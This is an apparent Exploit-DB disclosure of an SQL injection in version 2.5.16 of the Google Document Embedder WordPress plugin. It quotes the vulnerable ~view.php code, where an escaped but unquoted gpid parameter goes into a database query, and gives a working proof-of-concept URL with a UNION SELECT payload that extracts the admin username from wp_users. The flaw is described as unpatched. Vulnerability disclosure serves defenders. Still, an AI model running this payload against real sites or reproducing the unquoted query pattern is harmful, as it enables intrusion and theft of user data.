WordPress Plugin Google Document Embedder 2.5.16 - 'mysql_real_escpae_string' Bypass SQL Injection

EDB-ID:

35447




Platform:

PHP

Date:

2014-12-03


Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail 
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php

================================================================
50	// get profile
51	if ( isset( $_GET['gpid'] ) ) {
52		$gpid = mysql_real_escape_string( $_GET['gpid'] );
		//mysql_real_escape_string() is bypass 
53		if ( $profile = gde_get_profile( $gpid ) ) {
54			$tb = $profile['tb_flags'];
55			$vw = $profile['vw_flags'];
56			$bg = $profile['vw_bgcolor'];
57			$css = $profile['vw_css'];
58		}
59	}
================================================================

===============================================================
373 function gde_get_profile( $id ) {
374	global $wpdb;
375	$table = $wpdb->prefix . 'gde_profiles';
376	
377	$profile = $wpdb->get_results( "SELECT * FROM $table WHERE 

profile_id = $id", ARRAY_A );
378	$profile = unserialize($profile[0]['profile_data']);
379	
380	if ( is_array($profile) ) {
381		return $profile;
382	} else {
383		return false;
384	}
385 }
================================================================

2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com